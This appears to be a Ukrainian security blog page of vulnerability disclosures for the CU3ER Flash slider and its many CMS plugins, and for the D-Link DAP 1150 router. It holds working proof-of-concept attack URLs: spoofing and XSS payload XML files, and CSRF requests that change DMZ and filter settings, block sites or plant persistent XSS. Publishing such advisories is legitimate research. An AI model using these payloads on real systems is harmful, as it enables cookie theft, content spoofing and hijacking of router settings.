Websecurity - Веб безпека

Раніше я писав про уразливості в CU3ER. Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних плагінах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Вчора я писав про wpCU3ER для WordPress. Флешка CU3ER також міститься в наступних плагінах для WordPress: NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager, Cu3er Slider та інших плагінах, в тому числі кастом плагінах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах плагінів (по замовчуванню) або в error_log.

http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php та в багатьох php-файлах в підпапках плагіна
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.php

Уразливі всі плагіни з флешкою CU3ER: NextGen Cu3er Gallery 0.1, Simple Cu3er 1.0.1, Cu3er Post Elements 0.5.1, Gallery Manager, Cu3er Slider та попередні версії цих плагінів.

26.11.2013

Раніше я писав про уразливості в CU3ER. У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в веб додатку CU3ER та численних плагінах. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2014

Флешка CU3ER міститься в wpCU3ER для WordPress, jCU3ER і Vinaora Cu3er 3D Slide-show для Joomla, cu3er-silverstripe-extension для SilverStripe, collective.cu3er для Plone та багатьох інших плагінах. І всі вони мають Content Spoofing та XSS уразливості.

Адреси флешки в різних плагінах:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
В старих версіях плагіна:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

Перші два плагіни використовують останню версію CU3ER, а три інші плагини використовують версію 0.9.2 (а також в старих версіях wp-cu3er).

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі всі плагіни з флешкою CU3ER: wpCU3ER 0.75, jCU3ER 0.12, Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1, cu3er-silverstripe-extension, collective.cu3er 0.1 та попередні версії цих плагінів.

В даній добірці уразливості в веб додатках:

• HP LoadRunner, Remote Code Execution and Denial of Service (DoS) (деталі)
• LiveZilla 5.1.1.0 Stored XSS in operator clients (деталі)
• FlashCanvas 1.5 proxy.php XSS Vulnerability (деталі)
• Vtiger 5.4.0 Reflected Cross Site Scripting (деталі)
• Samsung TV - DoS vulnerability (деталі)

22.11.2013

У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в CU3ER. Це 3D слайдер зображень на флеші. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

17.04.2014

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі CU3ER 1.24 та попередні версії.

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery, Abuse of Functionality та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Firewall / DMZ через CSRF можна змінювати налаштувань DMZ.

Включити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Виключити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:false,%22ip%22:%22%22}&res_pos=0

CSRF (WASC-09):

В розділі Control / URL-filter через CSRF можна додавати, редагувати та видаляти налаштування URL-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=58&res_pos=0

Abuse of Functionality (WASC-42):

Цей функціонал можна використати для блокування доступу користувачам роутера до сайтів. Заборонити доступ до google.com:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Control / URL-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities - Surveillance via Symantec Web Gateway (деталі)
• Cross-Site Scripting (XSS) in Jamroom (деталі)
• CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass (деталі)
• Vulnerabilities in Apache Solr < 4.6.0 (деталі)
• Security Notice for CA Service Desk Manager (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Orange, Page Flip Image Gallery та DZS Video Gallery. Для котрих з’явилися експлоіти. Orange - це тема движка, Page Flip Image Gallery - це плагін для створення галереї зображень, DZS Video Gallery - це плагін для створення відео галереї.

• WordPress Orange Cross Site Request Forgery (деталі)
• WordPress Page Flip Image Gallery Shell Upload (деталі)
• WordPress DZS Video Gallery 3.1.3 Remote File Disclosure (деталі)

Стосовно DZS Video Gallery, то це не RFD, а Content Spoofing.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

CSRF (WASC-09):

В розділі Firewall / MAC-filter через CSRF можна додавати, редагувати та видаляти налаштування MAC-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=74&res_struct_size=0&res_pos=0

DoS атака через CSRF:

Додавши відповідні MAC-фільтри, можна заблокувати користувачам доступ в Інтернет через даний роутер. Для цього в полі mac треба вказати MAC-адресу пристрою, а в полі enable - DROP.

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / MAC-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=0

CSRF (WASC-09):

В розділі Firewall / Virtual servers через CSRF можна додавати, редагувати та видаляти віртуальні сервери.

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / Virtual servers. Атака відбувається через функції додавання та редагування в параметрі res_buf.

В даній добірці уразливості в веб додатках:

• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code (деталі)
• Multiple Cross-Site Scripting (XSS) in Claroline (деталі)
• SQL Injection in Dokeos (деталі)
• SQL Injection in Chamilo LMS (деталі)
• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access (деталі)

В 2011 році - початку 2012 року я оприлюднив численні уразливості в D-Link DAP 1150 (декілька десятків). Тоді я оприлюднив уразливості в адмінці в режими точки доступу, а зараз розповім про дірки в режимі роутера.

Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

CSRF (WASC-09):

В розділі Firewall в підрозділі IP-filters через CSRF можна додавати, редагувати та видаляти налаштування IP-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / IP-filters.

Атака через функцію додавання в параметрі res_buf (в полях: Name, IP Addresses Source, Destination, Ports Source, Destination).

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf (в полі Name, але не в інших полях).

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0